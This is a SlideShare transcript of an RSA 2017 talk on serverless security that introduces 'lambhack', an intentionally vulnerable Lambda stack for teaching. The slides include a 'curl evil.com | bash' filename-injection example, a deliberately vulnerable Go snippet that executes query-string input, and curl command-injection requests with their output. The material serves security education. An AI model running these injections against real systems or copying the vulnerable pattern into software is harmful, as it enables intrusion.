Successfully reported this slideshow.
Your SlideShare is downloading. ×

Serverless Security: Are you ready for the Future?

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Loading in …3
×

Check these out next

1 of 138 Ad

Serverless Security: Are you ready for the Future?

Download to read offline

Talk from RSA 2017 on Serverless Security and the 4 areas of growth for security in the world of serverless. In this talk, there is also the first release of lambhack, an open source, vulnerable lambda-based serverless stack demoing arbitrary code execution in lambda.

Talk from RSA 2017 on Serverless Security and the 4 areas of growth for security in the world of serverless. In this talk, there is also the first release of lambhack, an open source, vulnerable lambda-based serverless stack demoing arbitrary code execution in lambda.

Advertisement
Advertisement

More Related Content

Slideshows for you (20)

Similar to Serverless Security: Are you ready for the Future? (20)

Advertisement

More from James Wickett (20)

Advertisement

Serverless Security: Are you ready for the Future?

  1. 1. SESSION ID:SESSION ID: #RSAC James Wickett Serverless Security: Are you ready for the Future? ASD-F01 Head of Research Signal Sciences @wickett
  2. 2. #RSAC James Wickett 2 Head of Research at Signal Sciences Author DevOps Fundamentals at lynda.com Author of book on DevOps (email me for a free copy > james@signalsciences.com) Blogger at theagileadmin.com and labs.signalsciences.com
  3. 3. #RSAC Conclusion 3 Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging Security with serverless is easier Security with serverless is harder
  4. 4. #RSAC Conclusion (2) 4 Four key areas apply to serverless security Software Supply Chain Security Delivery Pipeline Security Data Flow Security Attack Detection New! A very vulnerable lambda stack open source project github.com/wickett/lambhack
  5. 5. #RSAC What is Serverless?
  6. 6. #RSAC Misconceptions
  7. 7. #RSAC It’s Marketing (cloud rebranded)
  8. 8. #RSAC Serverless == no servers
  9. 9. #RSAC Serverless == Backend as a Service
  10. 10. #RSAC serverless == Platform as a Service
  11. 11. #RSAC TK: AdrianCO quote
  12. 12. #RSAC So, what is Serverless?
  13. 13. #RSAC http://martinfowler.com/articles/serverless.html
  14. 14. #RSAC @mikebroberts
  15. 15. #RSAC Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services (‘in the cloud’) to manage server-side logic and state. http://martinfowler.com/articles/serverless.html
  16. 16. #RSAC Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party. http://martinfowler.com/articles/serverless.html
  17. 17. #RSAC History of Serverless 17 2012 - used to describe BaaS and Continuous Integration services run by third parties Late 2014 - AWS launched Lambda July 2015 - AWS launched API Gateway October 2015 - AWS re:Invent - The Serverless company using AWS Lambda 2015 to present - Frameworks forming 2016 - Serverless Conference http://www.slideshare.net/AmazonWebServices/arc308- the-serverless-company-using-aws-lambda
  18. 18. #RSAC 18 Client Server Database Proxy/LB Server Server Old School Arch
  19. 19. #RSAC Serverless Arch 19 Client Auth Service API Gateway Database Service Function A Function B Web Delivery
  20. 20. #RSAC 20
  21. 21. #RSAC What can we say is serverless?
  22. 22. #RSAC Serverless is Functions As a Service (FaaS)
  23. 23. #RSAC Containers on Demand
  24. 24. #RSAC Serverless is (no management of) Servers
  25. 25. #RSAC Serverless IS SERVICEFULL
  26. 26. #RSAC Serverless is an opinionated framework for compute
  27. 27. #RSAC Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
  28. 28. #RSAC A Short History of Cloud 28
  29. 29. #RSAC Virtualization
  30. 30. #RSAC “The Cloud”
  31. 31. #RSAC DEVOPS
  32. 32. #RSAC SaaS PaaS IaaS
  33. 33. #RSAC Private Cloud
  34. 34. #RSAC Then, along came containers
  35. 35. #RSAC containers are teh hawtness
  36. 36. #RSAC
  37. 37. #RSAC Lots of effort in Container Orchestration
  38. 38. #RSAC The Cloud was to Virtualization as Serverless will be to Containers
  39. 39. #RSAC If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
  40. 40. #RSAC Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
  41. 41. #RSAC So, what are the upsides?
  42. 42. #RSAC Scaling built in
  43. 43. #RSAC Pay for what you use in 100MS increments
  44. 44. #RSAC With Serverless system administration is (mostly) lower
  45. 45. #RSAC Serverless is implicit Microservices
  46. 46. #RSAC Short Circuits Ops and moves infrastructure runtime closer to devs
  47. 47. #RSAC You can skip Chefing Dockering all the things!
  48. 48. #RSAC Lean Startup Friendly
  49. 49. #RSAC Increased Velocity
  50. 50. #RSAC Great, what’s the catch?
  51. 51. #RSAC Ops Burden to rationalize Serverless model (specifically Deploy)
  52. 52. #RSAC Monitoring
  53. 53. #RSAC Logging
  54. 54. #RSAC Stateless for Real with no persistence* across function runs
  55. 55. #RSAC Vendor Lock-In
  56. 56. #RSAC Security
  57. 57. #RSAC Reliability
  58. 58. #RSAC
  59. 59. #RSAC Serverless Use cases
  60. 60. #RSAC Image resizing
  61. 61. #RSAC Queue processing 61 http://martinfowler.com/articles/serverless.html
  62. 62. #RSAC Run a web application
  63. 63. #RSAC API Gateway 63 http://martinfowler.com/articles/serverless.html
  64. 64. #RSAC CI/CD
  65. 65. #RSAC Security is the same and different
  66. 66. #RSAC What used to be system calls is now distributed computing over the network
  67. 67. #RSAC Serverless shifts attack surface to third parties
  68. 68. #RSAC Lets try a sample application in AWS
  69. 69. #RSAC Go Sparta 69 Golang! AWS Lambda supports bring your own binary Sparta wraps your binary with node.js shim
  70. 70. #RSAC
  71. 71. #RSAC Other options 71 Serverless Framework APEX Kappa
  72. 72. #RSAC Wordy 72 Analyzes textual occurrences given a block of text, returns JSON count of words Calls API under the hood to get text It is comprised of Lambda, s3, API Gateway
  73. 73. #RSAC
  74. 74. #RSAC
  75. 75. #RSAC
  76. 76. #RSAC go run main.go provision -s S3_BUCKET
  77. 77. #RSAC
  78. 78. #RSAC
  79. 79. #RSAC
  80. 80. #RSAC
  81. 81. #RSAC
  82. 82. #RSAC
  83. 83. #RSAC
  84. 84. #RSAC
  85. 85. #RSAC
  86. 86. #RSAC What I learned about serverless security
  87. 87. #RSAC
  88. 88. #RSAC Security
  89. 89. #RSAC Four areas of Serverless Security 89 Secure Software Supply Chain Delivery Pipeline Data Flow Security Attack Detection
  90. 90. #RSAC Secure Software Supply Chain
  91. 91. #RSAC Surface area Reduction!
  92. 92. #RSAC Surface area Expansion!
  93. 93. #RSAC SSL / TLS from the Provider
  94. 94. #RSAC New Way Old Way
  95. 95. #RSAC Routing from the provider
  96. 96. #RSAC Old Way New Way
  97. 97. #RSAC
  98. 98. #RSAC Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0
  99. 99. #RSAC Abuse of open IAM privs 99 https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
  100. 100. #RSAC Recommendation: Use a third-party service to monitor for provider config changes
  101. 101. #RSAC Provider Security 101 Disable root access keys Manage users with profiles Secure your keys in your deploy system Secure keys in dev system Use provider MFA
  102. 102. #RSAC Delivery Pipeline Security
  103. 103. #RSAC
  104. 104. #RSAC Unit Testing
  105. 105. #RSAC Easier to mock Harder to mock
  106. 106. #RSAC
  107. 107. #RSAC Integration Testing
  108. 108. #RSAC Configuration is part of delivery
  109. 109. #RSAC
  110. 110. #RSAC Simple Deploy Pipeline Security 110 Only dev keys can push to ‘dev’ Only build/deploy system can push to pre-prod Integration tests must pass in this env Security validation must take place Allow push to prod, only by deploy system
  111. 111. #RSAC Security Integration Testing 111 BDD-Security - github.com/continuumsecurity/bdd- security Gauntlt - gauntlt.org
  112. 112. #RSAC http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
  113. 113. #RSAC Data Flow Security 113 Development Data Flow Diagrams Threat modeling Runtime
  114. 114. #RSAC Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
  115. 115. #RSAC Application layer DoS
  116. 116. #RSAC Timeouts and Execution restrictions
  117. 117. #RSAC Attack Detection
  118. 118. #RSAC https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
  119. 119. #RSAC AppSec Greatest Hits (XSS, SQLi, Cmdexe) still relevant 15 years later!
  120. 120. #RSAC AppSec Problems 120
  121. 121. #RSAC Types of Attacks 121 XSS, Injection, Deserialization, … New surface area similar problems e.g. appending to ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
  122. 122. #RSAC Defense 122 Logging, emitting events Vandium (SQLi) wrapper Content Security Policy (CSP) More things need to be done here…
  123. 123. #RSAC New Thing Alert! 123 Want to see make the point that appsec is still relevant in serverless A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …) Introducing lambhack
  124. 124. #RSAC
  125. 125. #RSAC lambhack 125 A Vulnerable Lambda + API Gateway stack Open Source, MIT licensed Released for the first time here at RSA Includes arbitrary code execution in a query string More work needed, PRs accepted and looking for community help github.com/wickett/lambhack
  126. 126. #RSAC //command := lambdaEvent.PathParams["command"] command := lambdaEvent.QueryParams["args"] output := runner.Run(command) Vulnerable code is also vulnerable in Serverless
  127. 127. #RSAC Let’s take a look at cmdexe in lambhack
  128. 128. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=uname+-a;+sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux uname -a
  129. 129. #RSAC $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=cat+/proc/version;+sleep+1" > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi- build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) SMP Tue Dec 6 20:30:04 UTC 2016 cat /proc/version
  130. 130. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=ls+-la+/tmp;+sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64 Let’s see /tmp
  131. 131. #RSAC $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=ls+/tmp;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ pargs=touch+/tmp/wickettfile;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile Lambda Reuse!
  132. 132. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=which+curl;+sleep+1" > /usr/bin/curl Could we upload our own payload?
  133. 133. #RSAC XSS, SQLi, … More to come!
  134. 134. #RSAC email me if you are interested: james@signalsciences.com
  135. 135. #RSAC Conclusion 135 Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging Security with serverless is easier Security with serverless is harder
  136. 136. #RSAC Conclusion (2) 136 Four key areas apply to serverless security Software Supply Chain Security Delivery Pipeline Security Data Flow Security Attack Detection New! A very vulnerable lambda stack open source project github.com/wickett/lambhack
  137. 137. #RSAC
  138. 138. #RSAC Let’s talk! 138 James Wickett james@signalsciences.com @wickett

×